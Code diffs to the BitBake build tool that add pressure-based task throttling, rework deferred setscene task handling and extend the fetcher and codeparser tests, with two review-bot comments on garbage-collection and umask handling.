154 logger.info("preferred version %s of %s not available%s", pv_str, pn, itemstr) 154 logger.warning("preferred version %s of %s not available%s", pv_str, pn, itemstr)
155 available_vers = [] 155 available_vers = []
156 for file_set in pkg_pn: 156 for file_set in pkg_pn:
157 for f in file_set: 157 for f in file_set:
@@ -163,7 +163,7 @@ def findPreferredProvider(pn, cfgData, dataCache, pkg_pn = None, item = None):
163 available_vers.append(ver_str) 163 available_vers.append(ver_str)
164 if available_vers: 164 if available_vers:
165 available_vers.sort() 165 available_vers.sort()
166 logger.info("versions of %s available: %s", pn, ' '.join(available_vers)) 166 logger.warning("versions of %s available: %s", pn, ' '.join(available_vers))
167 else: 167 else:
168 logger.debug(1, "selecting %s as PREFERRED_VERSION %s of package %s%s", preferred_file, pv_str, pn, itemstr) 168 logger.debug(1, "selecting %s as PREFERRED_VERSION %s of package %s%s", preferred_file, pv_str, pn, itemstr)
169 169
diff --git a/bitbake/lib/bb/runqueue.py b/bitbake/lib/bb/runqueue.py
index 30cab5379e..886eef1f27 100644
--- a/bitbake/lib/bb/runqueue.py
+++ b/bitbake/lib/bb/runqueue.py
@@ -24,6 +24,7 @@ import pickle
24from multiprocessing import Process 24from multiprocessing import Process
25import shlex 25import shlex
26import pprint 26import pprint
27import time
27 28
28bblogger = logging.getLogger("BitBake") 29bblogger = logging.getLogger("BitBake")
29logger = logging.getLogger("BitBake.RunQueue") 30logger = logging.getLogger("BitBake.RunQueue")
@@ -142,6 +143,55 @@ class RunQueueScheduler(object):
142 self.buildable.append(tid) 143 self.buildable.append(tid)
143 144
144 self.rev_prio_map = None 145 self.rev_prio_map = None
146 self.is_pressure_usable()
147
148 def is_pressure_usable(self):
149 """
150 If monitoring pressure, return True if pressure files can be open and read. For example
151 openSUSE /proc/pressure/* files have readable file permissions but when read the error EOPNOTSUPP (Operation not supported)
152 is returned.
153 """
154 if self.rq.max_cpu_pressure or self.rq.max_io_pressure or self.rq.max_memory_pressure:
155 try:
156 with open("/proc/pressure/cpu") as cpu_pressure_fds, \
157 open("/proc/pressure/io") as io_pressure_fds, \
158 open("/proc/pressure/memory") as memory_pressure_fds:
159
160 self.prev_cpu_pressure = cpu_pressure_fds.readline().split()[4].split("=")[1]
161 self.prev_io_pressure = io_pressure_fds.readline().split()[4].split("=")[1]
162 self.prev_memory_pressure = memory_pressure_fds.readline().split()[4].split("=")[1]
163 self.prev_pressure_time = time.time()
164 self.check_pressure = True
165 except:
166 bb.note("The /proc/pressure files can't be read. Continuing build without monitoring pressure")
167 self.check_pressure = False
168 else:
169 self.check_pressure = False
170
171 def exceeds_max_pressure(self):
172 """
173 Monitor the difference in total pressure at least once per second, if
174 BB_PRESSURE_MAX_{CPU|IO|MEMORY} are set, return True if above threshold.
175 """
176 if self.check_pressure:
177 with open("/proc/pressure/cpu") as cpu_pressure_fds, \
178 open("/proc/pressure/io") as io_pressure_fds, \
179 open("/proc/pressure/memory") as memory_pressure_fds:
180 # extract "total" from /proc/pressure/{cpu|io}
181 curr_cpu_pressure = cpu_pressure_fds.readline().split()[4].split("=")[1]
182 curr_io_pressure = io_pressure_fds.readline().split()[4].split("=")[1]
183 curr_memory_pressure = memory_pressure_fds.readline().split()[4].split("=")[1]
184 exceeds_cpu_pressure = self.rq.max_cpu_pressure and (float(curr_cpu_pressure) - float(self.prev_cpu_pressure)) > self.rq.max_cpu_pressure
185 exceeds_io_pressure = self.rq.max_io_pressure and (float(curr_io_pressure) - float(self.prev_io_pressure)) > self.rq.max_io_pressure
186 exceeds_memory_pressure = self.rq.max_memory_pressure and (float(curr_memory_pressure) - float(self.prev_memory_pressure)) > self.rq.max_memory_pressure
187 now = time.time()
188 if now - self.prev_pressure_time > 1.0:
189 self.prev_cpu_pressure = curr_cpu_pressure
190 self.prev_io_pressure = curr_io_pressure
191 self.prev_memory_pressure = curr_memory_pressure
192 self.prev_pressure_time = now
193 return (exceeds_cpu_pressure or exceeds_io_pressure or exceeds_memory_pressure)
194 return False
145 195
146 def next_buildable_task(self): 196 def next_buildable_task(self):
147 """ 197 """
@@ -155,6 +205,12 @@ class RunQueueScheduler(object):
155 if not buildable: 205 if not buildable:
156 return None 206 return None
157 207
208 # Bitbake requires that at least one task be active. Only check for pressure if
209 # this is the case, otherwise the pressure limitation could result in no tasks
210 # being active and no new tasks started thereby, at times, breaking the scheduler.
211 if self.rq.stats.active and self.exceeds_max_pressure():
212 return None
213
158 # Filter out tasks that have a max number of threads that have been exceeded 214 # Filter out tasks that have a max number of threads that have been exceeded
159 skip_buildable = {} 215 skip_buildable = {}
160 for running in self.rq.runq_running.difference(self.rq.runq_complete): 216 for running in self.rq.runq_running.difference(self.rq.runq_complete):
@@ -1256,8 +1312,8 @@ class RunQueue:
1256 "fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv, 1312 "fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv,
1257 "sigdata" : bb.parse.siggen.get_taskdata(), 1313 "sigdata" : bb.parse.siggen.get_taskdata(),
1258 "logdefaultlevel" : bb.msg.loggerDefaultLogLevel, 1314 "logdefaultlevel" : bb.msg.loggerDefaultLogLevel,
1259 "logdefaultverbose" : bb.msg.loggerDefaultVerbose, 1315 "build_verbose_shell" : self.cooker.configuration.build_verbose_shell,
1260 "logdefaultverboselogs" : bb.msg.loggerVerboseLogs, 1316 "build_verbose_stdout" : self.cooker.configuration.build_verbose_stdout,
1261 "logdefaultdomain" : bb.msg.loggerDefaultDomains, 1317 "logdefaultdomain" : bb.msg.loggerDefaultDomains,
1262 "prhost" : self.cooker.prhost, 1318 "prhost" : self.cooker.prhost,
1263 "buildname" : self.cfgData.getVar("BUILDNAME"), 1319 "buildname" : self.cfgData.getVar("BUILDNAME"),
@@ -1700,6 +1756,9 @@ class RunQueueExecute:
1700 1756
1701 self.number_tasks = int(self.cfgData.getVar("BB_NUMBER_THREADS") or 1) 1757 self.number_tasks = int(self.cfgData.getVar("BB_NUMBER_THREADS") or 1)
1702 self.scheduler = self.cfgData.getVar("BB_SCHEDULER") or "speed" 1758 self.scheduler = self.cfgData.getVar("BB_SCHEDULER") or "speed"
1759 self.max_cpu_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_CPU")
1760 self.max_io_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_IO")
1761 self.max_memory_pressure = self.cfgData.getVar("BB_PRESSURE_MAX_MEMORY")
1703 1762
1704 self.sq_buildable = set() 1763 self.sq_buildable = set()
1705 self.sq_running = set() 1764 self.sq_running = set()
@@ -1735,6 +1794,29 @@ class RunQueueExecute:
1735 if self.number_tasks <= 0: 1794 if self.number_tasks <= 0:
1736 bb.fatal("Invalid BB_NUMBER_THREADS %s" % self.number_tasks) 1795 bb.fatal("Invalid BB_NUMBER_THREADS %s" % self.number_tasks)
1737 1796
1797 lower_limit = 1.0
1798 upper_limit = 1000000.0
1799 if self.max_cpu_pressure:
1800 self.max_cpu_pressure = float(self.max_cpu_pressure)
1801 if self.max_cpu_pressure < lower_limit:
1802 bb.fatal("Invalid BB_PRESSURE_MAX_CPU %s, minimum value is %s." % (self.max_cpu_pressure, lower_limit))
1803 if self.max_cpu_pressure > upper_limit:
1804 bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_CPU is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_cpu_pressure))
1805
1806 if self.max_io_pressure:
1807 self.max_io_pressure = float(self.max_io_pressure)
1808 if self.max_io_pressure < lower_limit:
1809 bb.fatal("Invalid BB_PRESSURE_MAX_IO %s, minimum value is %s." % (self.max_io_pressure, lower_limit))
1810 if self.max_io_pressure > upper_limit:
1811 bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_IO is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_io_pressure))
1812
1813 if self.max_memory_pressure:
1814 self.max_memory_pressure = float(self.max_memory_pressure)
1815 if self.max_memory_pressure < lower_limit:
1816 bb.fatal("Invalid BB_PRESSURE_MAX_MEMORY %s, minimum value is %s." % (self.max_memory_pressure, lower_limit))
1817 if self.max_memory_pressure > upper_limit:
1818 bb.warn("Your build will be largely unregulated since BB_PRESSURE_MAX_MEMORY is set to %s. It is very unlikely that such high pressure will be experienced." % (self.max_io_pressure))
1819
1738 # List of setscene tasks which we've covered 1820 # List of setscene tasks which we've covered
1739 self.scenequeue_covered = set() 1821 self.scenequeue_covered = set()
1740 # List of tasks which are covered (including setscene ones) 1822 # List of tasks which are covered (including setscene ones)
@@ -1893,6 +1975,20 @@ class RunQueueExecute:
1893 self.setbuildable(revdep) 1975 self.setbuildable(revdep)
1894 logger.debug(1, "Marking task %s as buildable", revdep) 1976 logger.debug(1, "Marking task %s as buildable", revdep)
1895 1977
1978 found = None
1979 for t in sorted(self.sq_deferred.copy()):
1980 if self.sq_deferred[t] == task:
1981 # Allow the next deferred task to run. Any other deferred tasks should be deferred after that task.
1982 # We shouldn't allow all to run at once as it is prone to races.
1983 if not found:
1984 bb.note("Deferred task %s now buildable" % t)
1985 del self.sq_deferred[t]
1986 update_scenequeue_data([t], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)
1987 found = t
1988 else:
1989 bb.note("Deferring %s after %s" % (t, found))
1990 self.sq_deferred[t] = found
1991
1896 def task_complete(self, task): 1992 def task_complete(self, task):
1897 self.stats.taskCompleted() 1993 self.stats.taskCompleted()
1898 bb.event.fire(runQueueTaskCompleted(task, self.stats, self.rq), self.cfgData) 1994 bb.event.fire(runQueueTaskCompleted(task, self.stats, self.rq), self.cfgData)
@@ -1934,6 +2030,10 @@ class RunQueueExecute:
1934 logger.error("Scenequeue had holdoff tasks: %s" % pprint.pformat(self.holdoff_tasks)) 2030 logger.error("Scenequeue had holdoff tasks: %s" % pprint.pformat(self.holdoff_tasks))
1935 err = True 2031 err = True
1936 2032
2033 for tid in self.scenequeue_covered.intersection(self.scenequeue_notcovered):
2034 # No task should end up in both covered and uncovered, that is a bug.
2035 logger.error("Setscene task %s in both covered and notcovered." % tid)
2036
1937 for tid in self.rqdata.runq_setscene_tids: 2037 for tid in self.rqdata.runq_setscene_tids:
1938 if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered: 2038 if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered:
1939 err = True 2039 err = True
@@ -1998,8 +2098,6 @@ class RunQueueExecute:
1998 logger.debug(1, "%s didn't become valid, skipping setscene" % nexttask) 2098 logger.debug(1, "%s didn't become valid, skipping setscene" % nexttask)
1999 self.sq_task_failoutright(nexttask) 2099 self.sq_task_failoutright(nexttask)
2000 return True 2100 return True
2001 else:
2002 self.sqdata.outrightfail.remove(nexttask)
2003 if nexttask in self.sqdata.outrightfail: 2101 if nexttask in self.sqdata.outrightfail:
2004 logger.debug(2, 'No package found, so skipping setscene task %s', nexttask) 2102 logger.debug(2, 'No package found, so skipping setscene task %s', nexttask)
2005 self.sq_task_failoutright(nexttask) 2103 self.sq_task_failoutright(nexttask)
@@ -2150,7 +2248,8 @@ class RunQueueExecute:
2150 if self.sq_deferred: 2248 if self.sq_deferred:
2151 tid = self.sq_deferred.pop(list(self.sq_deferred.keys())[0]) 2249 tid = self.sq_deferred.pop(list(self.sq_deferred.keys())[0])
2152 logger.warning("Runqeueue deadlocked on deferred tasks, forcing task %s" % tid) 2250 logger.warning("Runqeueue deadlocked on deferred tasks, forcing task %s" % tid)
2153 self.sq_task_failoutright(tid) 2251 if tid not in self.runq_complete:
2252 self.sq_task_failoutright(tid)
2154 return True 2253 return True
2155 2254
2156 if len(self.failed_tids) != 0: 2255 if len(self.failed_tids) != 0:
@@ -2264,10 +2363,16 @@ class RunQueueExecute:
2264 self.updated_taskhash_queue.remove((tid, unihash)) 2363 self.updated_taskhash_queue.remove((tid, unihash))
2265 2364
2266 if unihash != self.rqdata.runtaskentries[tid].unihash: 2365 if unihash != self.rqdata.runtaskentries[tid].unihash:
2267 hashequiv_logger.verbose("Task %s unihash changed to %s" % (tid, unihash)) 2366 # Make sure we rehash any other tasks with the same task hash that we're deferred against.
2268 self.rqdata.runtaskentries[tid].unihash = unihash 2367 torehash = [tid]
2269 bb.parse.siggen.set_unihash(tid, unihash) 2368 for deftid in self.sq_deferred:
2270 toprocess.add(tid) 2369 if self.sq_deferred[deftid] == tid:
2370 torehash.append(deftid)
2371 for hashtid in torehash:
2372 hashequiv_logger.verbose("Task %s unihash changed to %s" % (hashtid, unihash))
2373 self.rqdata.runtaskentries[hashtid].unihash = unihash
2374 bb.parse.siggen.set_unihash(hashtid, unihash)
2375 toprocess.add(hashtid)
2271 2376
2272 # Work out all tasks which depend upon these 2377 # Work out all tasks which depend upon these
2273 total = set() 2378 total = set()
@@ -2406,6 +2511,14 @@ class RunQueueExecute:
2406 2511
2407 if update_tasks: 2512 if update_tasks:
2408 self.sqdone = False 2513 self.sqdone = False
2514 for mc in sorted(self.sqdata.multiconfigs):
2515 for tid in sorted([t[0] for t in update_tasks]):
2516 if mc_from_tid(tid) != mc:
2517 continue
2518 h = pending_hash_index(tid, self.rqdata)
2519 if h in self.sqdata.hashes and tid != self.sqdata.hashes[h]:
2520 self.sq_deferred[tid] = self.sqdata.hashes[h]
2521 bb.note("Deferring %s after %s" % (tid, self.sqdata.hashes[h]))
2409 update_scenequeue_data([t[0] for t in update_tasks], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False) 2522 update_scenequeue_data([t[0] for t in update_tasks], self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self, summary=False)
2410 2523
2411 for (tid, harddepfail, origvalid) in update_tasks: 2524 for (tid, harddepfail, origvalid) in update_tasks:
@@ -2421,6 +2534,9 @@ class RunQueueExecute:
2421 2534
2422 for dep in sorted(self.sqdata.sq_deps[task]): 2535 for dep in sorted(self.sqdata.sq_deps[task]):
2423 if fail and task in self.sqdata.sq_harddeps and dep in self.sqdata.sq_harddeps[task]: 2536 if fail and task in self.sqdata.sq_harddeps and dep in self.sqdata.sq_harddeps[task]:
2537 if dep in self.scenequeue_covered or dep in self.scenequeue_notcovered:
2538 # dependency could be already processed, e.g. noexec setscene task
2539 continue
2424 logger.debug(2, "%s was unavailable and is a hard dependency of %s so skipping" % (task, dep)) 2540 logger.debug(2, "%s was unavailable and is a hard dependency of %s so skipping" % (task, dep))
2425 self.sq_task_failoutright(dep) 2541 self.sq_task_failoutright(dep)
2426 continue 2542 continue
@@ -2743,6 +2859,19 @@ def build_scenequeue_data(sqdata, rqdata, rq, cooker, stampcache, sqrq):
2743 sqdata.stamppresent = set() 2859 sqdata.stamppresent = set()
2744 sqdata.valid = set() 2860 sqdata.valid = set()
2745 2861
2862 sqdata.hashes = {}
2863 sqrq.sq_deferred = {}
2864 for mc in sorted(sqdata.multiconfigs):
2865 for tid in sorted(sqdata.sq_revdeps):
2866 if mc_from_tid(tid) != mc:
2867 continue
2868 h = pending_hash_index(tid, rqdata)
2869 if h not in sqdata.hashes:
2870 sqdata.hashes[h] = tid
2871 else:
2872 sqrq.sq_deferred[tid] = sqdata.hashes[h]
2873 bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
2874
2746 update_scenequeue_data(sqdata.sq_revdeps, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True) 2875 update_scenequeue_data(sqdata.sq_revdeps, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True)
2747 2876
2748def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True): 2877def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, summary=True):
@@ -2754,6 +2883,8 @@ def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, s
2754 sqdata.stamppresent.remove(tid) 2883 sqdata.stamppresent.remove(tid)
2755 if tid in sqdata.valid: 2884 if tid in sqdata.valid:
2756 sqdata.valid.remove(tid) 2885 sqdata.valid.remove(tid)
2886 if tid in sqdata.outrightfail:
2887 sqdata.outrightfail.remove(tid)
2757 2888
2758 (mc, fn, taskname, taskfn) = split_tid_mcfn(tid) 2889 (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
2759 2890
@@ -2781,28 +2912,20 @@ def update_scenequeue_data(tids, sqdata, rqdata, rq, cooker, stampcache, sqrq, s
2781 2912
2782 sqdata.valid |= rq.validate_hashes(tocheck, cooker.data, len(sqdata.stamppresent), False, summary=summary) 2913 sqdata.valid |= rq.validate_hashes(tocheck, cooker.data, len(sqdata.stamppresent), False, summary=summary)
2783 2914
2784 sqdata.hashes = {} 2915 for tid in tids:
2785 for mc in sorted(sqdata.multiconfigs): 2916 if tid in sqdata.stamppresent:
2786 for tid in sorted(sqdata.sq_revdeps): 2917 continue
2787 if mc_from_tid(tid) != mc: 2918 if tid in sqdata.valid:
2788 continue 2919 continue
2789 if tid in sqdata.stamppresent: 2920 if tid in sqdata.noexec:
2790 continue 2921 continue
2791 if tid in sqdata.valid: 2922 if tid in sqrq.scenequeue_covered:
2792 continue 2923 continue
2793 if tid in sqdata.noexec: 2924 if tid in sqrq.scenequeue_notcovered:
2794 continue 2925 continue
2795 if tid in sqrq.scenequeue_notcovered: 2926 if tid in sqrq.sq_deferred:
2796 continue 2927 continue
2797 sqdata.outrightfail.add(tid) 2928 sqdata.outrightfail.add(tid)
2798
2799 h = pending_hash_index(tid, rqdata)
2800 if h not in sqdata.hashes:
2801 sqdata.hashes[h] = tid
2802 else:
2803 sqrq.sq_deferred[tid] = sqdata.hashes[h]
2804 bb.note("Deferring %s after %s" % (tid, sqdata.hashes[h]))
2805
2806 2929
2807class TaskFailure(Exception): 2930class TaskFailure(Exception):
2808 """ 2931 """
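--- a/bitbake/lib/bb/server/process.py
+++ b/bitbake/lib/bb/server/process.py
@@ -25,6 +25,7 @@ import subprocess
 import errno
 import re
 import datetime
+import gc
 import bb.server.xmlrpcserver
 from bb import daemonize
 from multiprocessing import queues
@@ -152,7 +153,8 @@ class ProcessServer(multiprocessing.Process):
 conn = newconnections.pop(-1)
 fds.append(conn)
 self.controllersock = conn
-elif self.timeout is None and not ready:
+
+elif not self.timeout and not ready:
 print("No timeout, exiting.")
 self.quit = True
 
@@ -220,6 +222,7 @@ class ProcessServer(multiprocessing.Process):
 try:
 print("Running command %s" % command)
 self.command_channel_reply.send(self.cooker.command.runCommand(command))
+print("Command Completed")
 except Exception as e:
 logger.exception('Exception in server main event loop running command %s (%s)' % (command, str(e)))
 
@@ -347,7 +350,12 @@ class ServerCommunicator():
 logger.info("No reply from server in 30s")
 if not self.recv.poll(30):
 raise ProcessTimeout("Timeout while waiting for a reply from the bitbake server (60s)")
-return self.recv.get()
+ret, exc = self.recv.get()
+# Should probably turn all exceptions in exc back into exceptions?
+# For now, at least handle BBHandledException
+if exc and "BBHandledException" in exc:
+raise bb.BBHandledException()
+return ret, exc
 
 def updateFeatureSet(self, featureset):
 _, error = self.runCommand(["setFeatures", featureset])
@@ -586,7 +594,7 @@ class BBUIEventQueue:
 self.reader = ConnectionReader(readfd)
 
 self.t = threading.Thread()
-self.t.setDaemon(True)
+self.t.daemon = True
 self.t.run = self.startCallbackHandler
 self.t.start()
 
@@ -664,8 +672,10 @@ class ConnectionWriter(object):
 
 def send(self, obj):
 obj = multiprocessing.reduction.ForkingPickler.dumps(obj)
+gc.disable()
 with self.wlock:
 self.writer.send_bytes(obj)
+gc.enable()
 
 def fileno(self):
 return self.writer.fileno()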
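Review bot: In ConnectionWriter.send the added `gc.disable()` / `gc.enable()` pair is not exception-safe: if `send_bytes()` raises (for example on a closed pipe), the collector stays disabled for the rest of the process. The unconditional `gc.enable()` also switches collection back on for a caller that had turned it off on purpose. Wrapping the locked write in try/finally and restoring the state read from `gc.isenabled()` avoids both. The hunk does not say why collection must not run while `wlock` is held, so a one-line comment giving the reason would help the next reader.

```python
    def send(self, obj):
        # … unchanged: obj = ForkingPickler.dumps(obj) …
        gc_was_enabled = gc.isenabled()
        gc.disable()
        try:
            with self.wlock:
                self.writer.send_bytes(obj)
        finally:
            if gc_was_enabled:
                gc.enable()
```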
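--- a/bitbake/lib/bb/siggen.py
+++ b/bitbake/lib/bb/siggen.py
@@ -318,7 +318,8 @@ class SignatureGeneratorBasic(SignatureGenerator):
 else:
 sigfile = stampbase + "." + task + ".sigbasedata" + "." + self.basehash[tid]
 
-bb.utils.mkdirhier(os.path.dirname(sigfile))
+with bb.utils.umask(0o002):
+bb.utils.mkdirhier(os.path.dirname(sigfile))
 
 data = {}
 data['task'] = task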
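Review bot: The hard-coded `with bb.utils.umask(0o002):` around `mkdirhier()` overrides whatever umask the build was started with, so a deliberately stricter setting such as 077 is widened and the directory is presumably created group-writable and world-readable. If that is intended for build directories shared between users, it should be stated next to the call, e.g. `# group-writable on purpose: <reason>`, so nobody later mistakes it for an accident. The write of the signature file itself lies outside this hunk, so it is not visible whether it receives matching permissions. Because a umask is process-wide, it is also worth confirming that no other thread creates files while this block runs; the enclosing method starts and ends outside the hunk.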
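--- a/bitbake/lib/bb/tests/codeparser.py
+++ b/bitbake/lib/bb/tests/codeparser.py
@@ -111,9 +111,9 @@ ${D}${libdir}/pkgconfig/*.pc
 self.assertExecs(set(["sed"]))
 
 def test_parameter_expansion_modifiers(self):
-# - and + are also valid modifiers for parameter expansion, but are
+# -,+ and : are also valid modifiers for parameter expansion, but are
 # valid characters in bitbake variable names, so are not included here
-for i in ('=', ':-', ':=', '?', ':?', ':+', '#', '%', '##', '%%'):
+for i in ('=', '?', '#', '%', '##', '%%'):
 name = "foo%sbar" % i
 self.parseExpression("${%s}" % name)
 self.assertNotIn(name, self.references)
@@ -412,6 +412,32 @@ esac
 # Check final value
 self.assertEqual(self.d.getVar('ANOTHERVAR').split(), ['anothervalue', 'yetanothervalue', 'lastone'])
 
+def test_contains_vardeps_override_operators(self):
+# Check override operators handle dependencies correctly with the contains functionality
+expr_plain = 'testval'
+expr_prepend = '${@bb.utils.filter("TESTVAR1", "testval1", d)} '
+expr_append = ' ${@bb.utils.filter("TESTVAR2", "testval2", d)}'
+expr_remove = '${@bb.utils.contains("TESTVAR3", "no-testval", "testval", "", d)}'
+# Check dependencies
+self.d.setVar('ANOTHERVAR', expr_plain)
+self.d.prependVar('ANOTHERVAR', expr_prepend)
+self.d.appendVar('ANOTHERVAR', expr_append)
+self.d.setVar('ANOTHERVAR:remove', expr_remove)
+self.d.setVar('TESTVAR1', 'blah')
+self.d.setVar('TESTVAR2', 'testval2')
+self.d.setVar('TESTVAR3', 'no-testval')
+deps, values = bb.data.build_dependencies("ANOTHERVAR", set(self.d.keys()), set(), set(), self.d)
+self.assertEqual(sorted(values.splitlines()),
+sorted([
+expr_prepend + expr_plain + expr_append,
+'_remove of ' + expr_remove,
+'TESTVAR1{testval1} = Unset',
+'TESTVAR2{testval2} = Set',
+'TESTVAR3{no-testval} = Set',
+]))
+# Check final value
+self.assertEqual(self.d.getVar('ANOTHERVAR').split(), ['testval2'])
+
 #Currently no wildcard support
 #def test_vardeps_wildcards(self):
 # self.d.setVar("oe_libinstall", "echo test")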
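--- a/bitbake/lib/bb/tests/event.py
+++ b/bitbake/lib/bb/tests/event.py
@@ -6,17 +6,18 @@
 # SPDX-License-Identifier: GPL-2.0-only
 #
 
-import unittest
-import bb
-import logging
-import bb.compat
-import bb.event
+import collections
 import importlib
+import logging
+import pickle
 import threading
 import time
-import pickle
+import unittest
 from unittest.mock import Mock
 from unittest.mock import call
+
+import bb
+import bb.event
 from bb.msg import BBLogFormatter
 
 
@@ -75,7 +76,7 @@ class EventHandlingTest(unittest.TestCase):
 
 def _create_test_handlers(self):
 """ Method used to create a test handler ordered dictionary """
-test_handlers = bb.compat.OrderedDict()
+test_handlers = collections.OrderedDict()
 test_handlers["handler1"] = self._test_process.handler1
 test_handlers["handler2"] = self._test_process.handler2
 return test_handlers
@@ -96,7 +97,7 @@ class EventHandlingTest(unittest.TestCase):
 
 def test_clean_class_handlers(self):
 """ Test clean_class_handlers method """
-cleanDict = bb.compat.OrderedDict()
+cleanDict = collections.OrderedDict()
 self.assertEqual(cleanDict,
 bb.event.clean_class_handlers())
 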
diff --git a/bitbake/lib/bb/tests/fetch.py b/bitbake/lib/bb/tests/fetch.py
index 9453c90d2b..61dd5cccaf 100644
--- a/bitbake/lib/bb/tests/fetch.py
+++ b/bitbake/lib/bb/tests/fetch.py
@@ -371,6 +371,7 @@ class FetcherTest(unittest.TestCase):
371 if os.environ.get("BB_TMPDIR_NOCLEAN") == "yes": 371 if os.environ.get("BB_TMPDIR_NOCLEAN") == "yes":
372 print("Not cleaning up %s. Please remove manually." % self.tempdir) 372 print("Not cleaning up %s. Please remove manually." % self.tempdir)
373 else: 373 else:
374 bb.process.run('chmod u+rw -R %s' % self.tempdir)
374 bb.utils.prunedir(self.tempdir) 375 bb.utils.prunedir(self.tempdir)
375 376
376class MirrorUriTest(FetcherTest): 377class MirrorUriTest(FetcherTest):
@@ -471,7 +472,7 @@ class GitDownloadDirectoryNamingTest(FetcherTest):
471 super(GitDownloadDirectoryNamingTest, self).setUp() 472 super(GitDownloadDirectoryNamingTest, self).setUp()
472 self.recipe_url = "git://git.openembedded.org/bitbake" 473 self.recipe_url = "git://git.openembedded.org/bitbake"
473 self.recipe_dir = "git.openembedded.org.bitbake" 474 self.recipe_dir = "git.openembedded.org.bitbake"
474 self.mirror_url = "git://github.com/openembedded/bitbake.git" 475 self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
475 self.mirror_dir = "github.com.openembedded.bitbake.git" 476 self.mirror_dir = "github.com.openembedded.bitbake.git"
476 477
477 self.d.setVar('SRCREV', '82ea737a0b42a8b53e11c9cde141e9e9c0bd8c40') 478 self.d.setVar('SRCREV', '82ea737a0b42a8b53e11c9cde141e9e9c0bd8c40')
@@ -519,7 +520,7 @@ class TarballNamingTest(FetcherTest):
519 super(TarballNamingTest, self).setUp() 520 super(TarballNamingTest, self).setUp()
520 self.recipe_url = "git://git.openembedded.org/bitbake" 521 self.recipe_url = "git://git.openembedded.org/bitbake"
521 self.recipe_tarball = "git2_git.openembedded.org.bitbake.tar.gz" 522 self.recipe_tarball = "git2_git.openembedded.org.bitbake.tar.gz"
522 self.mirror_url = "git://github.com/openembedded/bitbake.git" 523 self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
523 self.mirror_tarball = "git2_github.com.openembedded.bitbake.git.tar.gz" 524 self.mirror_tarball = "git2_github.com.openembedded.bitbake.git.tar.gz"
524 525
525 self.d.setVar('BB_GENERATE_MIRROR_TARBALLS', '1') 526 self.d.setVar('BB_GENERATE_MIRROR_TARBALLS', '1')
@@ -553,7 +554,7 @@ class GitShallowTarballNamingTest(FetcherTest):
553 super(GitShallowTarballNamingTest, self).setUp() 554 super(GitShallowTarballNamingTest, self).setUp()
554 self.recipe_url = "git://git.openembedded.org/bitbake" 555 self.recipe_url = "git://git.openembedded.org/bitbake"
555 self.recipe_tarball = "gitshallow_git.openembedded.org.bitbake_82ea737-1_master.tar.gz" 556 self.recipe_tarball = "gitshallow_git.openembedded.org.bitbake_82ea737-1_master.tar.gz"
556 self.mirror_url = "git://github.com/openembedded/bitbake.git" 557 self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https"
557 self.mirror_tarball = "gitshallow_github.com.openembedded.bitbake.git_82ea737-1_master.tar.gz" 558 self.mirror_tarball = "gitshallow_github.com.openembedded.bitbake.git_82ea737-1_master.tar.gz"
558 559
559 self.d.setVar('BB_GIT_SHALLOW', '1') 560 self.d.setVar('BB_GIT_SHALLOW', '1')
@@ -649,6 +650,58 @@ class FetcherLocalTest(FetcherTest):
649 with self.assertRaises(bb.fetch2.UnpackError): 650 with self.assertRaises(bb.fetch2.UnpackError):
650 self.fetchUnpack(['file://a;subdir=/bin/sh']) 651 self.fetchUnpack(['file://a;subdir=/bin/sh'])
651 652
653 def test_local_gitfetch_usehead(self):
654 # Create dummy local Git repo
655 src_dir = tempfile.mkdtemp(dir=self.tempdir,
656 prefix='gitfetch_localusehead_')
657 src_dir = os.path.abspath(src_dir)
658 bb.process.run("git init", cwd=src_dir)
659 bb.process.run("git commit --allow-empty -m'Dummy commit'",
660 cwd=src_dir)
661 # Use other branch than master
662 bb.process.run("git checkout -b my-devel", cwd=src_dir)
663 bb.process.run("git commit --allow-empty -m'Dummy commit 2'",
664 cwd=src_dir)
665 stdout = bb.process.run("git rev-parse HEAD", cwd=src_dir)
666 orig_rev = stdout[0].strip()
667
668 # Fetch and check revision
669 self.d.setVar("SRCREV", "AUTOINC")
670 url = "git://" + src_dir + ";protocol=file;usehead=1"
671 fetcher = bb.fetch.Fetch([url], self.d)
672 fetcher.download()
673 fetcher.unpack(self.unpackdir)
674 stdout = bb.process.run("git rev-parse HEAD",
675 cwd=os.path.join(self.unpackdir, 'git'))
676 unpack_rev = stdout[0].strip()
677 self.assertEqual(orig_rev, unpack_rev)
678
679 def test_local_gitfetch_usehead_withname(self):
680 # Create dummy local Git repo
681 src_dir = tempfile.mkdtemp(dir=self.tempdir,
682 prefix='gitfetch_localusehead_')
683 src_dir = os.path.abspath(src_dir)
684 bb.process.run("git init", cwd=src_dir)
685 bb.process.run("git commit --allow-empty -m'Dummy commit'",
686 cwd=src_dir)
687 # Use other branch than master
688 bb.process.run("git checkout -b my-devel", cwd=src_dir)
689 bb.process.run("git commit --allow-empty -m'Dummy commit 2'",
690 cwd=src_dir)
691 stdout = bb.process.run("git rev-parse HEAD", cwd=src_dir)
692 orig_rev = stdout[0].strip()
693
694 # Fetch and check revision
695 self.d.setVar("SRCREV", "AUTOINC")
696 url = "git://" + src_dir + ";protocol=file;usehead=1;name=newName"
697 fetcher = bb.fetch.Fetch([url], self.d)
698 fetcher.download()
699 fetcher.unpack(self.unpackdir)
